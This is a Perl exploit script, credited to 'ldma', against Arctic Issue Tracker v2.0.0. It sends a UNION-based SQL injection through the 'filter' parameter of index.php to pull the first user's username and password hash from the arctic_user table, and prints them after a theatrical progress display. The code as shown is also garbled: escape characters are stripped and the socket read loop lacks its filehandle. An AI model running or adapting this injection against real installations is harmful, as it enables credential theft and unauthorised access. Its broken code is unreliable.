#!/usr/bin/perluse IO::Socket;

print q{

-----------------------------------------------

Arctic Issue Tracker v2.0.0 exploit by ldma

~ SubCode ~

use: arctic.pl [server] [dir]

sample:

$perl arctic.pl localhost /arctic/

-----------------------------------------------};$webpage = $ARGV[0];

$directory = $ARGV[1];

print " -initiatingn";

print "|--modules..OK!n";

sleep 1;

print "|--premodules..OK!n";

sleep 1;

print "|--preprocessors..OK!n";

sleep 1;

print " -opening channel.. OK!n";

sleep 2;

print "--------------------------------------------n";

print "~ configuration complete.. OK!n";

print "~ scanning";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!n";

if (!$webpage) { die " rtfm geekn"; }$wbb_dir =

"".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--";print "~ connecting";

$|=1;

foreach (1..1) {

print ".";

sleep 1;

}

print " OK!n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Servern";print "~ open exploiting-tree";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!n";

print $sock "GET $wbb_dir HTTP/1.1n";

print $sock "Accept: */*n";

print $sock "User-Agent: Hackern";

print $sock "Host: $webpagen";

print $sock "Connection: closenn";

print "[ ] Target: $webpagen";

while ($answer = ) {

if ($answer =~ /Current Filter: (.*)/) {

print "exploiting in progress";

$|=1;

foreach (1..3) {

print "...";

sleep 1;

}

print "OK!n[ ] vuln: OK!nnnwell done, ldma!nn";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

print "[ ] USER-ID: -1n";

print "[ ] ID-HASH: $1n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

exit();

}

}close($sock);# ldma